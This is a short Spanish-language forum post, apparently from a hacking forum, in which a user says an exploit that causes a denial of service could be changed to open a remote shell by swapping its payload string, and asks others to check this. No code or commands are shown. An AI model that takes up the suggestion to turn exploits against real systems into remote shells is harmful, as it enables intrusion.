Oigan viendo el xploir vi que si causa un DOs, pero porque el que lo escribio asi lo puso por la cadena que manda, pero se puede aprovechar para cambiar la cadena por una shell remota analizenlo y veran lo que les digo, si estoy mal corrijanme

saludos
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Manual] Buffer Overflow en Windows « 1 2 3 4 »
Hacking Avanzado 		ikary 45 16,401 Último mensaje 3 Mayo 2011, 14:51
por mordiskos
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines